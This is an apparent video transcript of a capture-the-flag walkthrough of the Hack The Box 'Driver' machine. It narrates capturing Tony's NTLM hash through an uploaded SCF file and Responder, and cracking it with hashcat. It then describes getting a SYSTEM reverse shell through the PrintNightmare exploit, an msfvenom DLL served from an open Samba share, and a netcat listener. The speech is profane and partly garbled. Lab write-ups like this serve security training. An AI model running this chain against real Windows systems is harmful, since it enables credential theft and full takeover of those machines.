What's up, YouTube? Well, I just came to my attention that the fucking, well, not just, but it came to my attention that the other video that I recorded for Driver had very low video quality, and I guess for some reason, I guess I had the wrong OBS settings for my resolution and shit, so that was my bad. But that means I'm gonna have to record another fucking video for this shit. And I'm gonna leave that one up, I guess. But if you want, you can watch this one instead. I don't know. I didn't want to have to record the same machine twice. Fuck me. So I'm just gonna blow past this shit real quick. So first, I'm gonna show out the NMAP scan results. Got port 80, whatever. I'm gonna go there. Oh fuck! I think I removed it from my host file. Gonna add that back. Oh, what the fuck's the IP? Driver. 10.10.11. 10.10.11.106. Alright, so now that that's in, gonna go to the website. Oh fuck, I forgot. Forgot to connect to the VPN. Alright, cool. Yeah, the credentials, if you watch the other video, they're admin. I didn't really do anything to find them. I just guessed. So yeah, here is the page. You're gonna go to update firmware. You're gonna upload a file right here. So the file you're gonna upload is a special file called an SEF file. I'm gonna show an example. So this is my SEF file. I called it @attack.sef. It's important that you add the at the file name because that's how the attack works. This right here, if you didn't know, usually puts files at the top of the directory in Windows. So you can even see it's the first file when I enter ls. Yeah, you're gonna enter this literally exactly this. You can replace that with your IP, and you're gonna upload that. Let me see if my IP is the same. Yep, it's the same. So pretty much just upload this. So before I do that, you're gonna run a responder. You have to run it with sudo, by the way. Fuck. Submit it, and you should get the hash for. It's not showing it, but it'll show the hash for Tony. I already have his hash saved on my machine, but that's how you get Tony's NTLM hash. So I saved it. I'm gonna cat hash.text. So actually, you can run hashcat -m5600. Just so you remember, 5600 is you use that mode for NTLM hashes. Hash.text w for passwords like these when you're cracking, when you're almost always gonna use raw q. word list, rocky.txt. Hold on, it's double dash word list. I forgot you can't use dash W for this. And all hashes shown, whatever. I'm gonna use a dash dash show command, and you'll see at the end right here, this is the cracked hash, Lil Tony. So I think I saved the creds on the machine here. Tony creds. You're gonna see it's Tony, Lil Tony, so that's the username and password right there. So in the other video, if you want, you can watch it, but I showed you guys a way to use NTLM or Windows credentials for WinRM and shit. And I remember seeing in that video, you could skip that step to grab user.txt. Like you could just go straight to root. So in this video, actually, I'm gonna skip that step. We're just gonna go straight to root, cause fuck that shit. You're gonna download this CVE right here. Hold on. It's called Print Nightmare. It's on GitHub. This is it. Oh, fuck. Hold on, let me search up that CVE. I know it's CVE 2021-1675. So, but it's a Python script to exploit Print Nightmare, and it also gives you a shell. Yeah, this is it. This is the one I'm using. No, this isn't the one I'm using. I think this is it. Yeah, it's this one. It's Python right here. So you could git clone the URL, and you'll get the same script I'm using. So I'm gonna go into that directory, and this is the command you'll use. Python 3, whatever, .py. This is just a notation that you use for like in package script. So to specify the target, you're gonna put the domain / username if you have it, : password if you have it, at the IP. And this right here is a share on my machine called open, and in that share it's gonna be a file, ref.dll. Alright, so in the other video I showed you how to configure the SMB server for this, but I'm gonna show it again since it was such bad quality. So sudo vim etsy samba smb.conf. There's a file you want to edit. You have to edit it as sudo, by the way. So to add a share, you're gonna put the name of the share, square brackets, and after that, indent, you're gonna add the path for the share, and you have to put browsable to yes, put guest OK to yes, and put read only to yes. I mean to no. These are the configs that you need for the remote machine to be able to call back to your share without authenticating and run your malicious reverse shell. So after you edit that, you're gonna use MSF Venom right here. MSF Venom -A for architecture, x64 -P. This is the payload, Windows x64 shell reverse TCP. You're gonna set the L host to your IP, L port, whatever port you want. -F, the format has to be, I don't know if it has to be, but the format is DLL. And -O, the file name is ... So I was using the directory home HTB machines driver, so I simply made -O ... /rev.dll. You can use whatever directory your shares in. You just gotta know what directory it's in, so you could put the reverse shell in it. So I'm not gonna run that because I already have it. And fuck. So after you've done all that, you're gonna sudo service smbd restart. That should confirm that you have the SMB server running. If you want, you could SMB client -n localhost and the name of your shared dir. So I can access my share. I can access all the files on the share. So that's how you can verify that it's accessible. Fuck. So what you do next is you run the CVE. First, you set up a netcat listener on the port that you specified in your MSF Venom command. Set a netcat listener to call back to, and you run it. Sheesh. I wasn't in the right directory. You run it. You'll get an error on this page, but you could just check up on your netcat listener, see if it's connected back. So, see, I got root. I didn't have to do any type of lateral movement, no types of privs. The privs was the shell. I didn't have to get no type of user shell. I just went straight to root. So cd, fuck, keep thinking I'm in Linux. Cd users, administrator, cd desktop, dir, and you got root.txt right there. Cd dot dir. For user.txt, you can go into Tony /desktop, and you got user.txt right there, so you're able to get both flags in one go. Don't really need to escalate from user, but I said I was just gonna skip it, but I'm actually gonna show you guys, just so you know, like, because this was an easy box, so it was really just use print nightmare, touch and go. But if you don't have root yet, like, you gotta open MSF console. It's gonna take a minute to load, but basically there's a module in Metasploit called auxiliary Windows. Is it Windows? Auxiliary scanner. WinRM CMD. Alright, so show options. Fuck. I'm gonna go top down. Set password Lil Tony. Set rhost 10.10.11.106. Set username Tony. That was it, right? So run. Oh shoot, fuck. Oh, but automatically it sets the command to ipconfig, right? However, I forgot to show you. Gotta set cmd to whatever command you want. So let me say pwd. And right here you get the directory and dir /desktop. Oh, fuck. Yeah, I'm kind of recording this on the fly, so I'm not really all there yet. Got these double backslashes here. That's another thing I forgot. Gay ass Windows directories. So yeah, that's user.txt right there. So this is even if you didn't have root, you could just use WinRM right here. I'm only using this because for some reason, like I said in the last video, my gem installer isn't fucking working, so I can't use evil WinRM, so I use this shit. It does what I need it to do, so whatever. So yeah, that's about it. This is I changed my OBS settings, so this should be a much higher quality recording. Sorry about the last one. I seen that comment in my notifications, and I was like, hold up, let me run the video back and shit. Like the quality was much worse than I thought, so I re-recorded it. Still got what you need. If there's anything I'm forgetting or whatever, like let me know and shit. Yeah, if you got any questions or whatever, comments, leave it in the comments below. Don't forget to like and subscribe, and I'll see y'all later. Peace.